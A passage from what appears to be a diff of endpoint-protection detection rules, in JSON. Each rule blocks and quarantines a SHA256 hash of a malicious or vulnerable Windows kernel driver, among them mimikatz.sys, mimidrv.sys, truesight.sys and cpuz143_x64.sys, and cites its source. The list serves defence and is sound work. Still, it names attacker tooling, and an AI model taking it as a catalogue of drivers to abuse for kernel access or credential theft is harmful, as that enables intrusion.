+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144110Z",
+ "creation_date": "2026-03-23T11:45:32.144112Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144118Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2c1b65c2988b337182f1ba57b404793454e30a7fd328d34bc2e79857dc437a4a",
+ "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "35b136ac-5d61-5fdb-9255-8efde8d6d7c8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463184Z",
+ "creation_date": "2026-03-23T11:45:30.463187Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463195Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6d68d8a71a11458ddf0cbb73c0f145bee46ef29ce03ad7ece6bd6aa9d31db9b7",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "35b3c963-847d-5ac0-aca8-ee66eca51cc5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834159Z",
+ "creation_date": "2026-03-23T11:45:30.834162Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834171Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "882d4bde14f068076056098a7e097b026a548a6cd6b2604daec846f5483f9866",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "35b65d15-d767-56aa-b9d6-b17d5e8a7167",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813061Z",
+ "creation_date": "2026-03-23T11:45:31.813064Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813073Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "552607a739ca2833a5800fe65f04febc3fc9531f8cd17dc562da487572e7672a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "35bd1c57-2937-5b33-9c5c-65b4688edc05",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462086Z",
+ "creation_date": "2026-03-23T11:45:30.462089Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462098Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "36f45a42ebf2de6962db92aaf8845d7f9fd6895bedc31422adcf31c59a79602d",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "35bf3bf1-a259-5d3d-a4bb-8cb9536f0809",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814689Z",
+ "creation_date": "2026-03-23T11:45:31.814692Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814701Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "895aecc148a913118019ace4656a71d5bf3c0c87bb7ffb96de409dba5bdd828e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "35cad061-e719-5edf-823c-41001ed39cd8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810663Z",
+ "creation_date": "2026-03-23T11:45:31.810665Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810671Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "323661cc6e15eb48e21c097c53253409f3637a1fff408a116bd828c4611ce3bc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "35d445ee-725a-534f-a66b-cd82b07165de",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146638Z",
+ "creation_date": "2026-03-23T11:45:32.146640Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146646Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "37d07c39dc10ae82a9d292c74f7c5f93c7bc133a0225402dafc21f664af079b6",
+ "comment": "Resigned Vulnerable TfSysMon driver used by ValleyRAT (aka amdi2c.sys and tProtect.dll) [https://x.com/anylink20240604/status/1905691075639222521] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "35d62fe6-8104-586e-8f42-a2139d4f5052",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819795Z",
+ "creation_date": "2026-03-23T11:45:30.819797Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819802Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "837d3b67d3e66ef1674c9f1a47046e1617ed13f73ee08441d95a6de3d73ee9f2",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "35df2083-1e20-58af-b412-8eaf849d1e72",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811580Z",
+ "creation_date": "2026-03-23T11:45:31.811583Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811591Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d9bce72c8f8817de3028795f07f1cea6dfc0143860acce73f21ceffcb82fc899",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "35e0a09d-4293-5a71-bc4d-71275842b875",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824726Z",
+ "creation_date": "2026-03-23T11:45:31.824728Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824733Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7565d7f7b811d658278b511b5334a6cd21f551b31d180cc6efddd515ed793c74",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "35f8a780-3ead-59f1-aa74-933a96e9648f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825744Z",
+ "creation_date": "2026-03-23T11:45:30.825746Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825752Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "505fbf8c447320aaedfedb02b64423cc2140b328aa6da4ed23ecf2067ffb1d81",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "35fd48f6-e87c-5aa1-9f95-cf0da201d14c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.471991Z",
+ "creation_date": "2026-03-23T11:45:31.471994Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472004Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "50d7f7fa334582eaee68abf8215a1283c0a3e405e601e56ea41aa9553570907d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "360a960b-449a-59f2-b7b6-163f6c75de6a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836011Z",
+ "creation_date": "2026-03-23T11:45:30.836013Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836019Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8bda2d609bd41e2c29f81803be5cc8a15984a041ac77a34fabd9a806897c24cd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "360be8d1-017d-5cd4-98e2-f34155bebab0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145075Z",
+ "creation_date": "2026-03-23T11:45:32.145077Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145083Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ef9d653aaa2e629b211cd367a32c381eba694ba85682b987497c287d7dbc0082",
+ "comment": "Malicious Kernel Driver (aka driver_ef9d653a.sys) [https://www.loldrivers.io/drivers/14e51012-5429-483e-9423-49778c3bd1c2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3612f005-dc2b-5239-ad5e-60a5b0124529",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480788Z",
+ "creation_date": "2026-03-23T11:45:30.480790Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480795Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "38e6d7c2787b6289629c72b1ec87655392267044b4e4b830c0232243657ee8f9",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3613dbd0-1369-59a2-b68e-9e4b8246a9a5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611640Z",
+ "creation_date": "2026-03-23T11:45:29.611642Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611647Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "536333c1fb9066a12c7791b740fcf637f6f86b45bd57baf0f27ae33c3b6c6cf1",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "36151a0f-f877-504d-9ba1-ecac6dc52113",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827664Z",
+ "creation_date": "2026-03-23T11:45:30.827666Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827672Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2faedf73d553ccbb206f8e2cd9e758c0bc0362cfb8d75e551f044407e02f0d75",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3615e11d-43ea-5afe-8a3f-45a9116bf814",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145712Z",
+ "creation_date": "2026-03-23T11:45:31.145714Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145719Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ec98851bf8f19d301efb0d8b4b9724f038a784e20421a62696bbdeae5e20f050",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3622bac0-a61e-5c2a-a714-3c29a77750a9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474780Z",
+ "creation_date": "2026-03-23T11:45:31.474784Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474795Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "09dcdc4c882022babb23af2ac0bbac4535fcc9fc8e60bf415f00ebba2adaf86d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "362a5491-56e1-54c0-a8f9-435f25ad9131",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979977Z",
+ "creation_date": "2026-03-23T11:45:29.979979Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979985Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7d8937c18d6e11a0952e53970a0934cf0e65515637ac24d6ca52ccf4b93d385f",
+ "comment": "Vulnerable Kernel Driver (aka nt3.sys) [https://www.loldrivers.io/drivers/d5118882-6cdd-4b06-8bf4-e9818f16137e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "36342af2-1c23-5d26-a3af-35895359705f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477170Z",
+ "creation_date": "2026-03-23T11:45:30.477174Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477183Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7227377a47204f8e2ff167eee54b4b3545c0a19e3727f0ec59974e1a904f4a96",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3636d07a-fc26-5677-b6c2-7b5f7d12aab2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146953Z",
